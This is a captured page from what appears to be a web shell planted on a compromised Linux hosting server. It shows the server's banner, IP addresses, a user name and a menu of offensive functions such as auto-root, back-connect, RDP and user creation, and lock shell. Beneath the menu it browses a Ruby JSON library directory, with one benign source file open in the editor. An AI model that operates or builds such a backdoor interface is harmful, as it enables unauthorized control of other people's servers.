Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
multi_json /
adapters /
[ HOME SHELL ]
Name
Size
Permission
Action
gson.rb
425
B
-rw-r--r--
jr_jackson.rb
615
B
-rw-r--r--
json_common.rb
643
B
-rw-r--r--
json_gem.rb
222
B
-rw-r--r--
json_pure.rb
221
B
-rw-r--r--
nsjsonserialization.rb
1.3
KB
-rw-r--r--
oj.rb
2.05
KB
-rw-r--r--
ok_json.rb
634
B
-rw-r--r--
yajl.rb
437
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : json_common.rb
require 'multi_json/adapter' module MultiJson module Adapters class JsonCommon < Adapter defaults :load, :create_additions => false, :quirks_mode => true def load(string, options = {}) if string.respond_to?(:force_encoding) string = string.dup.force_encoding(::Encoding::ASCII_8BIT) end options[:symbolize_names] = true if options.delete(:symbolize_keys) ::JSON.parse(string, options) end def dump(object, options = {}) options.merge!(::JSON::PRETTY_STATE_PROTOTYPE.to_h) if options.delete(:pretty) object.to_json(options) end end end end
Close